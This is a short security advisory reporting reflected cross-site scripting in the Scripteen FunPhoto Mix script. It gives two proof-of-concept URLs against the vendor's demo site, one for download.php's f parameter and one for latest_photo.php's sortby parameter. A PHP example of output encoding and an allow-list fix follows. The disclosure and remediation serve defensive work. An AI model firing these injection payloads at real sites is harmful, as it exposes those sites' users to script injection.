
Scripteen FunPhoto Mix Cross Site Scripting


##################################################################################
       __            _                      _            ____          
      / /___ _____  (_)_____________ ______(_)__  _____ / __ \_________ _
 __  / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ /
\____/\__,_/_/ /_/_/____/____/\__,_/_/  /_/\___/____(_)____/_/   \__, /
                                                                /____/
##################################################################################                              
Scripteen FunPhoto Mix Script, XSS Vulnerabilities
Software Page: http://scripteen.com/scripts/scripteen-fun-photo-script.html
Script Demo: http://www.funphoto.scripteen.com/

Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhatz Inc. and Janissaries Platform.
##################################################################################

[1] XSS Vulnerabilities on Demo Site

[+] (download.php, f param)
>>> http://www.funphoto.scripteen.com//download.php?f=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28354564%29%3C%2fScRiPt%3E

[+] (latest_photo.php, sortby param)
>>> http://www.funphoto.scripteen.com//latest_photo.php?sortby=%22%20onmouseover%3dprompt%281215%29%20bad%3d%22
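
The shape of the two payloads above suggests two output contexts: the `f` value carries a script element, and the `sortby` value closes a double-quoted attribute and adds an event handler. The following is an added example of handling both on output, not code from the advisory or from Scripteen; the helper names `h` and `safe_sortby`, the allow-list values and the surrounding markup are assumptions, because the advisory does not show the script's source.

```php
<?php
// Added example: hypothetical helpers, not taken from the Scripteen code base.

// Encode untrusted text for HTML element content or a quoted attribute value.
// ENT_QUOTES covers both ' and ", so the value cannot close the attribute.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed allow-list; the script's real sort keys are not given in the advisory.
const SORT_KEYS = ['date', 'views', 'rating'];

// Accept only known sort keys and fall back to the first one otherwise.
function safe_sortby(?string $raw): string
{
    return in_array($raw, SORT_KEYS, true) ? $raw : SORT_KEYS[0];
}

// The two parameter values from the advisory, decoded the way PHP
// would present them in $_GET['f'] and $_GET['sortby'].
$f      = urldecode('%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28354564%29%3C%2fScRiPt%3E');
$sortby = urldecode('%22%20onmouseover%3dprompt%281215%29%20bad%3d%22');

// Element context (assumed: a message that echoes the f parameter).
// The angle brackets and quotes are emitted as entities, so no tag is created.
echo '<p>File not found: ' . h($f) . "</p>\n";

// Attribute context (assumed: a link that repeats the current sort key).
// The allow-list discards the injected value; h() stays as defence in depth.
echo '<a href="latest_photo.php?sortby=' . h(rawurlencode(safe_sortby($sortby))) . '">Sort</a>' . "\n";
```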





//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.


